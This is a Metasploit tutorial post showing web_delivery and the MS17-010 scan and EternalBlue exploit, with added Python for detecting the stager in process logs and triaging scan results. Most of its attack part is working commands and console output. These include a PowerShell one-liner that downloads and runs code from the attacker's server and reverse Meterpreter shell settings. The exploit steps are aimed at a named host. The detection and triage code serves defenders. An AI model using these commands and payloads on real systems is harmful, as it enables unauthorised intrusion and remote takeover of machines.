MSF: MS17-010 detection scan / web_delivery

MSF introduction

Metasploit is a free, downloadable framework that makes it easy to obtain, develop and run attacks against vulnerabilities in computer software. It ships with hundreds of professional-grade exploit modules for known software vulnerabilities.

Metasploit installation

Installing with the official installer script is the recommended route. As with any downloaded installer, read msfinstall before running it. After installation, set up PostgreSQL yourself so that module lookups with search are fast.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

MSF web_delivery

msf > use exploit/multi/script/web_delivery  
- Set the target so the matching stager is generated (Python, PHP or PowerShell; target 2 is PowerShell here)
msf exploit(web_delivery) > set target 2  
target => 2  
- Choose the reverse-connect payload
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
- Start the HTTP server the target will fetch the stager from
msf exploit(web_delivery) > set SRVPORT 8081  
SRVPORT => 8081  
msf exploit(web_delivery) > set URIPATH /  
URIPATH => /  
msf exploit(web_delivery) > set lhost <public ip>  # the externally reachable IP of the attacker box  
lhost => <public ip>  
- Set the port the reverse shell connects back to (LHOST above is the address)
msf exploit(web_delivery) > set lport 6666  
lport => 6666  
msf exploit(web_delivery) > run  
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.100:6666
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8081/  
[*] Local IP: http://192.168.2.100:8081/
[*] Server started.
## The generated stager; the one below is the PowerShell variant
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://<public ip>:8081/');  
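The one-liner above is also exactly what a defender sees in process-creation telemetry (Sysmon event 1, Security 4688), so it is worth knowing how noisy it is. As an added example, not from the original post or from the Metasploit project, the Python below scores command lines against the indicators the stager carries (-nop, -w hidden, new-object net.webclient, IEX with downloadstring, DefaultCredentials) and flags those that match several at once. The `host|pid|cmdline` log layout and the log lines themselves are constructed for this example.

```python
"""
Added example (not from the original post): a detector for the web_delivery
PowerShell stager as it appears in process-creation logs.  The log lines and
the 'host|pid|cmdline' layout below are constructed for the example.
"""
import re

# Indicators lifted from the one-liner the module prints:
#   -nop -w hidden -c $k=new-object net.webclient; ... DefaultCredentials; IEX $k.downloadstring('http://...')
INDICATORS = {
    "noprofile": re.compile(r"(?i)(?:^|\s)-no?p(?:rofile)?\b"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "webclient": re.compile(r"(?i)new-object\s+(?:system\.)?net\.webclient"),
    "iex_download": re.compile(r"(?i)\bIEX\b.*\.download(?:string|data)\("),
    "default_creds": re.compile(r"(?i)defaultcredentials"),
}
# Pull out the stager URL so the C2 host/port can be blocked and hunted for.
URL_RE = re.compile(r"(?i)https?://[^'\"\s)]+")


def score_command_line(cmdline):
    """Return (score, matched indicator names, download URLs) for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    urls = URL_RE.findall(cmdline)
    return len(hits), hits, urls


def triage(log_lines, threshold=3):
    """Parse 'host|pid|cmdline' lines and return alerts for lines hitting >= threshold indicators.

    A single indicator (e.g. -NoProfile) is normal admin usage; the stager hits all five.
    """
    alerts = []
    for line in log_lines:
        host, pid, cmdline = line.split("|", 2)
        score, hits, urls = score_command_line(cmdline)
        if score >= threshold:
            alerts.append({"host": host, "pid": int(pid), "score": score,
                           "hits": hits, "urls": urls})
    return alerts


# Constructed sample telemetry: one web_delivery stager, two benign PowerShell launches.
SAMPLE_LOGS = [
    "WS01|4120|powershell.exe -nop -w hidden -c $k=new-object net.webclient;"
    "$k.proxy=[Net.WebRequest]::GetSystemWebProxy();"
    "$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $k.downloadstring('http://203.0.113.10:8081/');",
    "WS02|5210|powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
    "WS03|6001|powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOGS):
        print(alert)
```

The threshold matters: `-nop` or `-w hidden` alone appear in plenty of legitimate scheduled tasks, but the combination of a hidden window, a WebClient object and `IEX` on downloaded content is the stager's shape regardless of which host or port it points at.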
MS17-010 scan / attack

The MS17-010 scanner module reports which hosts are vulnerable and which have already been implanted with the DoublePulsar backdoor. An INFECTED result means someone else has already exploited that host, which is an incident-response finding as much as a pentest one.
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 1.1.1.1-1.1.1.100
set threads 100
run
[+] 172.20.64.176:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[!] 172.20.64.176:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x32752EAF
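Against a large range the VULNERABLE and INFECTED lines are interleaved with the rest of the console output, so they need to be pulled out per host. As an added example, not the module's own code, the Python below parses the two result line formats shown above (for instance from a file written with msfconsole's `spool` command) into per-host records and splits the scanned range into infected, vulnerable-only and no-finding hosts. The sample output and host list are constructed for the example.

```python
"""
Added example (not part of the smb_ms17_010 module): triage helper for the
scanner's console output.  SAMPLE_OUTPUT and SCANNED_HOSTS are constructed to
match the line formats the module prints for vulnerable and infected hosts.
"""
import re

VULN_RE = re.compile(
    r"^\[\+\]\s+(?P<host>[\d.]+):(?P<port>\d+)\s+-\s+Host is likely VULNERABLE to MS17-010!"
    r"\s*\((?P<os>[^)]*)\)"
)
INFECTED_RE = re.compile(
    r"^\[!\]\s+(?P<host>[\d.]+):(?P<port>\d+)\s+-\s+Host is likely INFECTED with DoublePulsar!"
    r"\s+-\s+Arch:\s+(?P<arch>[^,]+),\s+XOR Key:\s+(?P<xor>0x[0-9A-Fa-f]+)"
)


def _empty(port):
    """Fresh per-host record; a host only gets one when the scanner said something about it."""
    return {"port": int(port), "vulnerable": False, "os": None,
            "infected": False, "arch": None, "xor_key": None}


def parse_scan_output(lines):
    """Map host -> record from the scanner's [+]/[!] lines; other output is ignored."""
    results = {}
    for line in lines:
        line = line.strip()
        m = VULN_RE.match(line)
        if m:
            rec = results.setdefault(m.group("host"), _empty(m.group("port")))
            rec["vulnerable"] = True
            rec["os"] = m.group("os")
            continue
        m = INFECTED_RE.match(line)
        if m:
            rec = results.setdefault(m.group("host"), _empty(m.group("port")))
            rec["infected"] = True
            rec["arch"] = m.group("arch")
            rec["xor_key"] = int(m.group("xor"), 16)  # DoublePulsar's per-host XOR key
    return results


def summarize(results, scanned_hosts):
    """Split the range into (infected, vulnerable-only, no-finding) sorted host lists."""
    infected = sorted(h for h, r in results.items() if r["infected"])
    vulnerable_only = sorted(h for h, r in results.items()
                             if r["vulnerable"] and not r["infected"])
    no_finding = sorted(h for h in scanned_hosts if h not in results)
    return infected, vulnerable_only, no_finding


# Constructed sample: one host vulnerable and already implanted, one vulnerable only,
# one that produced no result line.
SAMPLE_OUTPUT = [
    "[+] 172.20.64.176:445     - Host is likely VULNERABLE to MS17-010! "
    "(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)",
    "[!] 172.20.64.176:445     - Host is likely INFECTED with DoublePulsar! "
    "- Arch: x64 (64-bit), XOR Key: 0x32752EAF",
    "[+] 172.20.64.180:445     - Host is likely VULNERABLE to MS17-010! "
    "(Windows 7 Professional 7601 Service Pack 1)",
    "[*] Scanned 3 of 3 hosts (100% complete)",
    "[*] Auxiliary module execution completed",
]
SCANNED_HOSTS = ["172.20.64.176", "172.20.64.180", "172.20.64.181"]

if __name__ == "__main__":
    infected, vulnerable_only, no_finding = summarize(parse_scan_output(SAMPLE_OUTPUT), SCANNED_HOSTS)
    print("infected:       ", infected)
    print("vulnerable only:", vulnerable_only)
    print("no finding:     ", no_finding)
```

Hosts in the no-finding bucket were not necessarily patched: port 445 may have been filtered or the host offline, so they are worth a second pass rather than being written off.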

The exploit module hands us a Meterpreter session directly. In my testing so far the success rate against Windows 2003 seems low. Note that the module's only exploit target (see the options output below) is Windows 7 / Server 2008 R2 x64, so Server 2003 is outside what this module supports.
msf > use exploit/windows/smb/ms17_010_eternalblue  
msf exploit(ms17_010_eternalblue) > set rhost 172.20.64.176  
msf exploit(ms17_010_eternalblue) > options  
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp  
msf exploit(ms17_010_eternalblue) > set lhost <local ip>  
msf exploit(ms17_010_eternalblue) > set lport <local listening port>  
msf exploit(ms17_010_eternalblue) > run -j  
The `options` output, with the payload selected, looks like this:
Module options (exploit/windows/smb/ms17_010_eternalblue):  
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):  
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     6666             yes       The listen port

Exploit target:  
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


Thanks to 一哥.

郝先生